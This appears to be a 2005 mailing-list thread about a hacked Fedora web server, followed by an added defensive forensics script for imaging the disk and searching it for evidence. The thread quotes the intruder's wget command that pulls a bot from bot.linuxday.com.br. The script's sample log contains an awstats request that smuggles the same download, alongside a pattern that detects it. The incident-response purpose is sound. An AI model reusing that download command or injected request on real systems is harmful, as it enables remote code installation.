Server compromised

Jeff Vian jvian10 at charter.net
Sun Feb 20 00:07:45 UTC 2005


On Fri, 2005-02-18 at 16:20 -0800, paul at topguncomputers.com wrote:
> > On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul at topguncomputers.com
> > <paul at topguncomputers.com> wrote:
> >> Apparently someone has hacked into my webserver.  And is installing perl
> >> scripts into the /tmp/ directory.  They're usually named .linuxday* or
> >> .cinta* and a few other names as well.
> >>
> >> From what I can tell something is causing apache to run a command like
> >> "sh wget bot.linuxday.com.br -O {the above mentioned files are then
> >> listed}"
> >>
> >> sometimes the site is worm.linuxday.com.br
> >>
> >> I'm curious if anyone has heard about this before.  I'm currently running
> >> Fedora 1 with all the latest security patches.
> >
> > The only way to ensure your system is clean, and likely to remain clean,
> > is to:
> >
> > 1. Do a bare metal install
> > 2. Change all passwords to new strong passwords
> > 3. Disable cleartext services, ftp, telnet, rsh, etc.
> > 4. Disable root remote login (use su or sudo)
> > 5. Restore your uncompromised data
> > 6. etc.
> > I had to do this for a client and the next 3 days the intruder tried
> > to get back in.
> >
> > --
> > Leonard Isham, CISSP
> > Ostendo non ostento.
> >
> 
> In place of FTP, what would you suggest? That is the only clear-text
> password service I allow. So what else can I use in place of that?
> 
> And shell access is denied for all accounts, except for 2.
> 
> I get the feeling this came in on awstats, although I'm not 100% positive,
> and I'm wanting to find out how it got in first before I just delete and
> start over again.
> 
For forensics, take that disk and save it.
Use a clean drive to reinstall.

Analysis can be done later, after following the suggestions to reinstall
and lock down.
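As an added example (not code from anyone on this thread or from Fedora), here is a small POSIX shell script that follows the advice above: image the compromised disk with dd and record a SHA-256 so the copy can be verified later, then run the later analysis against the image mounted read-only rather than against the live box, looking for the hidden /tmp files and the awstats requests carrying wget that paul described. The 4 KiB "disk", the directory tree standing in for the mounted image, and the access-log lines are all constructed here so it runs offline; the `awstats.*wget` grep pattern and the `x=` query parameter in the sample log are assumptions, not the actual request used against awstats.

```shell
#!/bin/sh
# Added example for this thread, not code from any list member or from Fedora.
# 1) Preserve the compromised disk as a hashed image; keep the original disk, work from the image.
# 2) Do the later analysis against the image, not the live box: hidden /tmp droppers
#    and awstats requests that carry wget, as described in the thread.
set -eu

# SHA-256 of a file (GNU sha256sum, falling back to shasum on BSD-like systems).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
    else shasum -a 256 "$1" | cut -d' ' -f1; fi
}

# Copy SRC (a block device such as /dev/hda1, or any file) to DEST sector by sector.
# conv=noerror,sync keeps going past unreadable sectors and zero-fills them instead of
# aborting; bs=512 limits that padding to one sector. Writes DEST.sha256, prints the
# image hash, and fails if source and image hashes differ.
image_disk() {
    local src="$1" dest="$2" src_hash dest_hash
    dd if="$src" of="$dest" bs=512 conv=noerror,sync 2>/dev/null
    src_hash=$(sha256_of "$src")
    dest_hash=$(sha256_of "$dest")
    printf '%s  %s\n' "$dest_hash" "$dest" > "$dest.sha256"
    if [ "$src_hash" != "$dest_hash" ]; then
        echo "image_disk: hash mismatch for $dest" >&2
        return 1
    fi
    echo "$dest_hash"
}

# On the analysis box (needs root) a partition image is mounted so nothing on it can run:
#   mount -o ro,noexec,nodev,loop disk.dd /mnt/evidence
# The functions below take that mount point (or, here, a constructed tree) as ROOT.

# Hidden files directly under ROOT/tmp named like the droppers paul saw.
find_dropper_files() {
    find "$1/tmp" -maxdepth 1 -type f \( -name '.linuxday*' -o -name '.cinta*' \) | sort
}

# Access-log lines where a request for awstats carries a wget command
# (pattern is an assumption drawn from the commands quoted in the thread).
suspicious_awstats_requests() {
    grep -iE 'awstats.*wget' "$1" || true
}

# Constructed evidence set under DIR: a 4 KiB fake "disk" plus a tree standing in for
# the mounted image (two droppers, one harmless file, a log with one constructed hit).
build_sample_evidence() {
    local dir="$1"
    head -c 4096 /dev/urandom > "$dir/disk.raw"
    mkdir -p "$dir/root/tmp" "$dir/root/var/log/httpd"
    : > "$dir/root/tmp/.linuxday1"
    : > "$dir/root/tmp/.cinta"
    : > "$dir/root/tmp/session.txt"
    cat > "$dir/root/var/log/httpd/access_log" <<'EOF'
192.0.2.10 - - [17/Feb/2005:22:10:01 -0800] "GET /index.html HTTP/1.1" 200 1024
192.0.2.77 - - [17/Feb/2005:22:12:44 -0800] "GET /cgi-bin/awstats.pl?x=wget%20bot.linuxday.com.br%20-O%20/tmp/.linuxday1 HTTP/1.1" 200 512
192.0.2.11 - - [17/Feb/2005:22:13:02 -0800] "GET /cgi-bin/awstats.pl?config=site HTTP/1.1" 200 4096
EOF
}

# Demo on the constructed data; a real run points image_disk at the device itself.
work=$(mktemp -d)
build_sample_evidence "$work"
image_disk "$work/disk.raw" "$work/disk.dd"
find_dropper_files "$work/root"
suspicious_awstats_requests "$work/root/var/log/httpd/access_log"
rm -rf "$work"
```

The point of hashing both ends is that the image, not the disk, is what gets handled from now on; the recorded hash lets anyone re-check that the copy being analysed is still the one taken that night, and the read-only, noexec mount keeps the dropped scripts from running on the analysis machine.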
